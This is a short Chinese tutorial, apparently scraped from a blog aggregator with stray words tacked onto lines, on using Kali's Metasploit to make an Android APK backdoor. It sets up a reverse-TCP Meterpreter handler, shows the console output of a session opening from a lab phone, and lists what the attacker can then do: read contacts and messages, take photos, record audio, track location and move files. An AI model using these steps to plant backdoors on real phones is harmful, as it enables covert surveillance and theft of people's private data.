Kali之Metasploit生成apk后门控制安卓

扫盲教程,大佬勿喷。html

实验中请更改成你环境的IP。java

生成apk后门

Kali Linux(Hack):192.168.169.76android

Android(靶机):192.168.169.137web

启动kali,开终端,生成apk后门。仅有9.2k的apk,也是蛮吊浏览器

lhost为kali的ip,lport指定一个端口。bash

开metasploit控制台侦听

 

root@kali:~# msfconsole
msf > use exploit/multi/handler
msf exploit(handler) > set payload android/meterpreter/reverse_tcp #设置payload
payload => android/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 192.168.169.76 #kali的IP
lhost => 192.168.169.76
msf exploit(handler) > set lport 445 #对应刚才设的端口
lport => 445
msf exploit(handler) > exploit
 
[*] Started reverse TCP handler on 192.168.169.76:445
[*] Starting the payload handler...
[*] Sending stage (63194 bytes) to 192.168.169.137
[*] Meterpreter session 1 opened (192.168.169.76:445 -> 192.168.169.137:45552) at 2017-09-28 01:36:01 -0400

  

复制apk出来装到手机上打开后就能够exploit了,会看到会话反弹回来。微信

能够看下帮助都有啥操做session

meterpreter > helpapp

功能示例

读取联系人,信息,拍照,录音,获取位置信息,上传下载文件等等,仍是挺强大的。tcp

Kali之Metasploit生成apk后门控制安卓Kali之Metasploit生成apk后门控制安卓

Kali之Metasploit生成apk后门控制安卓

补充freebuf上的文章:

相关文章
相关标签/搜索